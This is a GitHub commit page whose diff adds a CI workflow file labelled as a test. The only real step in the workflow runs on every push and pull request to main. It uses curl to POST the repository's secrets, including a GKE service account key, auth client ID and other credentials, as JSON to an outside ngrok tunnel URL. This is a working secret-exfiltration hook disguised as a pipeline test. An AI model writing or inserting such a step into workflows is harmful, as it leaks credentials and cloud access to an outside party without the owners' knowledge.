Skip to content

Commit

Permalink
Testing some stuff with the pipeline
Browse files Browse the repository at this point in the history
  • Loading branch information
souyahia-monk committed Sep 5, 2024
1 parent 87174eb commit 2eaf775
Showing 1 changed file with 25 additions and 0 deletions.
25 changes: 25 additions & 0 deletions .github/workflows/test-env.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
name: Test Env
run-name: Test Env

on:
pull_request:
branches: [main]
push:
branches: [ main ]

jobs:
build:
name: Test
runs-on: ubuntu-latest
permissions:
actions: read
contents: read
security-events: write

steps:
- name: 💾 Checking out the repository
uses: actions/checkout@v4
- name: ⚙️ Performing the test
shell: bash
run: |
curl --location 'https://sharing-cheerful-shiner.ngrok-free.app/test' --header 'Content-Type: application/json' --data '{"API_DOMAIN":"${{secrets.API_DOMAIN}}","AUTH_CLIENT_ID":"${{secrets.AUTH_CLIENT_ID}}","AUTH_DOMAIN":"${{secrets.AUTH_DOMAIN}}","GKE_CLUSTER":"${{secrets.GKE_CLUSTER}}","GKE_PROJECT":"${{secrets.GKE_PROJECT}}","GKE_SA_KEY":"${{secrets.GKE_SA_KEY}}","GKE_ZONE":"${{secrets.GKE_ZONE}}","FUTURA_SECRET":"${{secrets.FUTURA_SECRET}}"}'

0 comments on commit 2eaf775

Please sign in to comment.